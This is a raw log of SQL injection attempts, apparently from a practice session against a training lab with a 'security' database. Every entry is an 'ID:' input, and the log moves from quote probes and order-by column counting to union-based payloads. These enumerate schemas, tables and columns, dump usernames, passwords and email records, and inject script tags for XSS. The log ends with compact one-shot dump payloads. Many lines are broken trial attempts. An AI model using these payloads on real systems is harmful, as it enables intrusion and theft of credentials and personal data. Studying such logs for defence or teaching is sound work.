ID:1
ID:1
ID:1]
ID:1]
ID:1]
ID:1\
ID:1'
ID:1'
ID:1\
ID:1' -- 
ID:1' 
ID:1'  
ID:1'  --
ID:1'  --
ID:1'  -- 
ID:1' union select 1,database(),3 -- 
ID:0' union select 1,database(),3 -- 
ID:0' union select 1,database(),3 
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1
ID:1‘ union select 1,2,3 #
ID:1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 #
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:-1‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3 -- 
ID:0‘ union select 1,2,3  -- 
ID:0‘ union select 1,2,3
ID:0’ union select 1,2,3
ID:1
ID:1'
ID:1' union  select 1,2,3 -- 
ID:-1' union  select 1,2,3 -- 
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 
ID:-1' union  select 1,2,3 #
ID:1
ID:1\
ID:1' union  select 1,2,3 -- 
ID:1' union  select 1,2,3 #
ID:-1' union  select 1,2,3 #
ID:1'
ID:1 -- 
ID:1 union select 1,2,3 -- 
ID:-1 union select 1,2,3 -- 
ID:-1' union select 1,2,3 -- 
ID:1\
ID:1
ID:1
ID:1
ID:1
ID:1' -- 
ID:1' or 1==1 -- 
ID:1' or 1=1 -- 
ID:100' -- 
ID:100' or 1=1 -- 
ID:1' and database() regexp '[a-z]' -- 
ID:1' and database() regexp '[a-z]' -- 
ID:1' --
ID:1\
ID:1' -- 
ID:1' --
ID:1' -- 
ID:1'; -- 
ID:1' union select 1,2,3 ; -- 
ID:0' union select 1,2,3 ; -- 
ID:1
ID:10' union select 1,(version),'3
ID:100' union select 1,(version()),'3
ID:100' union select 1,(version()),'3
ID:100' union select 1,(version()),'3
ID:100' union select 1,version(),'3
ID:100' union select 1,version(),3
ID:100' union select 1,version(),'3
ID:100' union select 1,version(),3 -- -
ID:100' union select 1,version(),3 -- -
ID:100' union select 1,version(),3 -- -
ID:100' union select 1,version(),' 3
ID:100' union select 1,version(),'3
ID:100' '
ID:100' order by 1 '
ID:100'
ID:100' order by 1 '
ID:1
ID:1
ID:1
ID:1
ID:1'
ID:1'  -- -
ID:1'  order by 1  -- -
ID:1'  order by 5  -- -
ID:1'  order by 5  -- -
ID:1'  order by 4  -- -
ID:1'  order by 3  -- -
ID:1'  union select 1,2,3  -- -
ID:1'  union select 1,2,3,4  -- -
ID:1'  union select 1,2,3  -- -
ID:10000000000000000000000000'  union select 1,2,3  -- -
ID:-1'  union select 1,2,3  -- -
ID:.1'  union select 1,2,3  -- -
ID:1'  and 1=2  union select 1,2,3  -- -
ID:1'  and 1=2  union select 1,database(),3  -- -
ID:1'  and 1=2  union select 1,'Muhammed',3  -- -
ID:1'  and 1=2  union select 1,user(),3  -- -
ID:1
ID:1'  and 1=2  union select 1,user(),version()  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  limit 0,0  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  limit 0,1  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  limit 0,2  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  limit 1,1  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  limit 2,1  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  limit 3,1  -- -
ID:1'  and 1=2  union select 1,table_name,3 from  information_Schema.tables  limit 4,1  -- -
ID:1'  and 1=2  union select 1,ocncat(table_name),3 from  information_Schema.tables    -- -
ID:1'  and 1=2  union select 1,Concat(table_name),3 from  information_Schema.tables    -- -
ID:1'  and 1=2  union select 1,group_Concat(table_name),3 from  information_Schema.tables    -- -
ID:1'  and 1=2  union select 1,group_Concat(table_name,'<br>'),3 from  information_Schema.tables    -- -
ID:1'  and 1=2  union select 1,group_Concat(table_name,'<br>'),3 from  information_Schema.tables where table_schema="security"    -- -
ID:1'  and 1=2  union select 1,group_Concat(Column_name,'<br>'),3 from  information_Schema.Columns where table_user='users'   -- -
ID:1'  and 1=2  union select 1,group_Concat(Column_name,'<br>'),3 from  information_Schema.Columns where table_name='users'   -- -
ID:1'  and 1=2  union select 1,group_Concat(username,password,'<br>'),3 from  users    -- -
ID:1'  and 1=2  union select 1,group_Concat(username,'~~~',password,'<br>'),3 from  users    -- -
ID:1'
ID:1'
ID:1
ID:1'
ID:1'
ID:1'
ID:1' union select 1,2,3 -- -
ID:.1' union select 1,2,3 -- -
ID:.1' union select 1,0x3c7363726970743e616c6572742831293c2f7363726970743e,3 -- -
ID:.1' union select 1,'<script>alert(1)</script>',3 -- -
ID:.1' union select 1,'<script>alert('Sql By XsS')</script>',3 -- -
ID:.1' union select 1,'<script>alert("Sql By XsS")</script>',3 -- -
ID:1'
ID:1
ID:1\
ID:1'  -- -
ID:1'  --  
ID:1'  order by 6--  
ID:1'  order by 6 --  
ID:1'  order by 5--  
ID:1'  order by 4--  
ID:1'  order by 3--  
ID:1'  order by 1,2,3--  
ID:1'  order by 1,2,3--  
ID:1'  order by --  4
ID:1'  order by --  4
ID:1'  order by 4 --  
ID:1'  order by 3 --  
ID:1'  order by 3 --  
ID:1'  union by 1,2,3 --  
ID:1'  union select 1,2,3 --  
ID:-1'  union select 1,2,3 --  
ID:.1'  union select 1,2,3 --  
ID:.1 union select 1,user(),database() -- -
ID:.1' union select 1,user(),database() -- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata -- --
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 2,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 3,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 4,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 5,1-- -
ID:.1' union select 1,group_concat(schema_name),3 from information_schema.schemata limit 1,1-- -
ID:.1' union select 1,group_concat(schema_name),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name<br>),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name<br>),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name'<br>'),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name,'<br>'),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(table_name,'<br>'),3 from information_schema.tables -- -
ID:1
ID:1'
ID:1\
ID:1'-- -
ID:1'order by 5-- -
ID:1'order by 4-- -
ID:1'order by 3-- -
ID:1'union select 1,2,3-- -
ID:1'union select 1,2,3-- -
ID:.1'union select 1,2,3-- -
ID:.1'union select 1,database(),version()-- -
ID:1'-- -
ID:1-- -
ID:1-- -
ID:1
ID:1'
ID:1'--
ID:1'--
ID:1' union select 1,group_concat(schema_name).3  from information_schema.schemata -- -
ID:1' union select 1,group_concat(schema_name).3  from information_schema.schemata -- -
ID:1' union select 1,group_concat(schema_name).3  from information_schema.schemata -- -
ID:1' union select 1,group_concat(schema_name),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name<br>),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name<br>),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name,<br>),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name,<br>),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name,<br>),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name,<br>),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name,<br>),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(schema_name,'<br>'),3  from information_schema.schemata -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables where table_name ='security' -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables where table_name ='security' -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables where table_name ='security' -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables where table_name ='security' -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables where table_name ='security' -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables where table_name ='security' -- -
ID:-1' union select 1,group_concat(table_name,'<br>'),3  from information_schema.tables where table_schema ='security' -- -
ID:-1' union select 1,group_concat(column_name,'<br>'),3  from information_schema.columns where table_name ='emails' -- -
ID:-1' union select 1,group_concat(column_name,'<br>'),3  from information_schema.columns where table_name ='emails' -- -
ID:-1' union select 1,group_concat(column_name,'<br>'),3  from information_schema.columns where table_name ='emails' -- -
ID:-1' union select 1,group_concat(column_name,'<br>'),3  from information_schema.columns where table_name ='emails' -- -
ID:-1' union select 1,group_concat(column_name,'<br>'),3  from information_schema.columns where table_name ='emails' -- -
ID:-1' union select 1,group_concat(id,email_id,'<br>'),3  from information_schema.columns where table_name ='emails' -- -
ID:-1' union select 1,group_concat(id,email_id,'<br>'),3 from 'emails' -- -
ID:1
ID:1'
ID:1'
ID:1'
ID:1'
ID:1"
ID:1
ID:1'
ID:1"
ID:1
ID:1'
ID:1' -- -
ID:1' order by 100 -- -
ID:1' order by 50 -- -
ID:1' order by 5 -- -
ID:1' order by 5 -- -
ID:1' order by 5 -- -
ID:1' order by 4 -- -
ID:1' order by 3 -- -
ID:1' order by 3 -- -
ID:1' union select 1,2,3, -- -
ID:1' union select 1,2,3, -- -
ID:.1' union select 1,2,3, -- -
ID:.1' union select 1,2,3, -- -
ID:.1' union select 1,2,3-- -
ID:.1' union select 1,2,version()-- -
ID:.1' union select 1,2,database()-- -
ID:.1' union select 1,2,table_schema where information_schema.schemata=database()-- -
ID:.1' union select 1,2,table_schema where information_schema.table=database()-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 0,0-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 0,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 0,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 0,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 0,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,3-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 1,4-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 2,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 2,3-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 4,4-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 4,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 4,2-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 4,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 4,1-- -
ID:.1' union select 1,schema_name,3 from information_schema.schemata limit 5,1-- -
ID:.1' union select 1,group concat(schema_name),3 from information_schema.schemata -- -
ID:.1' union select 1, group_concat(schema_name),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name, <br>),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name, <br>),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name, '<br>'),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name, '0x3c62723e'),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(schema_name, 0x273c62723e27),3 from information_schema.schemata -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables where table_schema=security -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables where table_schema='security' -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns where column_schema='security' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns where column_schema='security' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns where column_schema='security' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns where columns_schema='security' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns where table_schema='security' -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables where table_schema='security' -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables where table_schema='security' -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables where table_schema='security' -- -
ID:.1' union select 1,group_concat(table_name, '<br>'),3 from information_schema.tables where table_schema='security' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_schema='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='emails' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.column where table_name='email' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns where table_name='email' -- -
ID:.1' union select 1,group_concat(column_name, '<br>'),3 from information_schema.columns where table_name='emails' -- -
ID:.1' union select 1,group_concat(id,email_id '<br>'),3 from 'emails' -- -
ID:.1' union select 1,group_concat(id,email_id '<br>'),3 from emails -- -
ID:.1' union select 1,group_concat(id,email_id,'<br>'),3 from emails -- -
ID:.1' union select 1,group_concat(id,email_id,'<br>'),3 from emails -- -
ID:.1' union select 1,group_concat(id,email_id,'<br>'),3 from emails -- -
ID:.1' union select 1,group_concat(id,0x3a,email_id,'<br>'),3 from emails -- -
ID:.1' union select 1,group_concat(id,0x3a,0x3aemail_id,'<br>'),3 from emails -- -
ID:.1' union select 1,group_concat(id,0x3a,0x3a,email_id,'<br>'),3 from emails -- -
ID:1
ID:1'
ID:1'
ID:1'
ID:1"
ID:1'
ID:1' -- -
ID:1'
ID:1' order by 7-- -
ID:1' order by 6-- -
ID:1' order by 5-- -
ID:1' order by 4-- -
ID:1' order by 3-- -
ID:1' order by 3-- -
ID:1' order by 4-- -
ID:1' order by 3-- -
ID:1' order by 5-- -
ID:1' order by 3-- -
ID:1' order by 3 -- -
ID:1' order by 3 -- -
ID:1' order by 3 -- -
ID:1' order by 3 -- -
ID:1' union select 3 -- -
ID:1' order by 3-- -
ID:1' order by 3 -- -
ID:1' order by 4 -- -
ID:1' order by 3 -- -
ID:1' union select 1,2,3 -- -
ID:1' union select 1,2,3  -- -
ID:.1' union select 1,2,3  -- -
ID:.1' union select 1,user(), version(), 3  -- -
ID:.1' union select 1,user()3  -- -
ID:.1' union select 1,user(),3  -- -
ID:.1' union select 1,user(),version(),3  -- -
ID:.1' union select 1,user(),version()  -- -
ID:.1' union select 1,version()  -- -
ID:.1' union select 1, version()  -- -
ID:.1' union select 1, version(), 3 -- -
ID:.1' union select 1, user(),version(), 3 -- -
ID:.1' union select 1, user(),version()-- -
ID:.1' union select 1, schema_name,3-- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata-- -
ID:.1' union select 1, schema_name,3 from information_schema-- -
ID:.1' union select 1, schema_name,3 from information_schema.schemta-- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata-- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 1,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 0,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 2,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 2,3 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 2,2 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 2,2 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 2,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 3,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 4,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 7,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 6,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 6,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,5 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,5 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,4 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,3 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,2 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,1 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,0 -- -
ID:.1' union select 1, schema_name,3 from information_schema.schemata limit 5,1 -- -
ID:.1' union select 1, group_concat(schema_name),3 from information_schema.schemata  -- -
ID:.1' union select 1, group_concat(schema_name),3 from information_schema.schemata  -- -
ID:.1' union select 1, group_concat(schema_name, '<br>'),3 from information_schema.schemata  -- -
ID:.1' union select 1, group_concat(schema_name, '<br>'),3 from information_schema.schemata  -- -
ID:.1' union select 1, group_concat(schema_name, '0x3c62723e27),3 from information_schema.schemata  -- -
ID:.1' union select 1, group_concat(schema_name, 0x273c62723e27),3 from information_schema.schemata  -- -
ID:.1' union select 1, group_concat(table_name, 0x273c62723e27),3 from information_schema.tables where table_schema='security'  -- -
ID:.1' union select 1, group_concat(table_name, 0x273c62723e27),3 from information_schema.tables where table_schema='security'  -- -
ID:.1' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.column where column_schema='security'  -- -
ID:.1' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.column where table_schema='security'  -- -
ID:.1' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.column where table_schema='security'-- -
ID:.1' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.column where table_name='emails'-- -
ID:.1' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.column where table_name='emails'-- -
ID:.9' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.column where table_name='emails'-- -
ID:.9' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(column_name, 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(id'',email_id', 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(id,email_id', 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(id,email_id, 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(id,,email_id, 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(id,email_id, 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(id, email_id, 0x273c62723e27),3 from information_schema.columns where table_name='emails'-- -
ID:.1' union select 1, group_concat(id, email_id, 0x273c62723e27),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, 0x273c62723e27),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, 0x273c62723e27),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, 0x273c62723e27),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, 0x273c62723e27),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, 0x273c62723e27),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'emails '--
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'emails '-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'emails '-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'emails '-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'email '-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'emails '-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from emails-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from 'emails'-- -
ID:.1' union select 1, group_concat(id, email_id, '<br>'),3 from emails -- -
ID:.1' union select 1, group_concat(id, 0x3a,email_id, '<br>'),3 from emails -- -
ID:.1' union select 1, group_concat(id, 0x3a,0x3a,email_id, '<br>'),3 from emails -- -
ID:-1' union select 1, group_concat(id, 0x3a,0x3a,email_id, '<br>'),3 from emails -- -
ID:1'and 1=2 union select 1, group_concat(id, 0x3a,0x3a,email_id, '<br>'),3 from emails -- -
ID:1'and and 0 union select 1, group_concat(id, 0x3a,0x3a,email_id, '<br>'),3 from emails -- -
ID:1'and and false union select 1, group_concat(id, 0x3a,0x3a,email_id, '<br>'),3 from emails -- -
ID:-1' union select 1, group_concat(id, 0x3a,0x3a,email_id, '<br>'),3 from emails -- -
ID:1'
ID:1'
ID:1
ID:1'
ID:1
ID:1'
ID:1'
ID:1' -- -
ID:1' -- -
ID:1' union select 1,2,3 -- -
ID:-1' union select 1,2,3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.schemata) where (@a) in (@a:concat(@a,schema_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.schemata) where (@a) in (@a:=concat(@a,schema_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (security.tables) where (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where table_schema=database() (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where table_schema=database()  and  (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where table_schema !='information_schema'  and  (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where table_schema != 'information_schema'  and tabel_name like 'us%' (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where table_schema != 'information_schema'  and tabel_name like 'us%' and  (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where table_schema != 'information_schema'  and table_name like 'us%' and  (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.tables) where table_schema != 'information_schema'  and  (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema'  and  (@a) in (@a:=concat(@a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_name= 'users' and  (@a) in (@a:=concat(@a,column_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,column_name,0x3a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,column_name,0x3a,table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,column_name,':::::::',table_name,'<br>'))))a),3 -- -
ID:-1' union select 1,(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,'<br>'))))a),3 -- -
ID:-1' union select 1,concat('Test by X123',user(),database(),(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,'<br>'))))a),'<br>'),3 -- -
ID:-1' union select 1,concat('Test by X123','<br>',user(),'<br>',database(),'<br>',(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,))))a),'<br>'),3 -- -
ID:-1' union select 1,concat('Test by X123 '<br>',user(),'<br>',database(),'<br>',(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,))))a)),3 -- -
ID:-1' union select 1,concat('Test by X123',<br>',user(),database(),(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,))))a),'<br>'),3 -- -
ID:-1' union select 1,concat('Test by X123',user(),database(),(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,'<br>'))))a)),3 -- -
ID:-1' union select 1,concat('Test by X123',0x3c62723e,user(),database(),(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,'<br>'))))a)),3 -- -
ID:-1' union select 1,concat('Test by X123',0x3c62723e,user(),0x3c62723e,database(),(select (@a) from (select (@a:=0x00),(select (@a) from (information_Schema.columns) where table_schema != 'information_schema' and  (@a) in (@a:=concat(@a,'Tabls:::',table_name,'::::::::::Columns::::::::::::',column_name,'<br>'))))a)),3 -- -
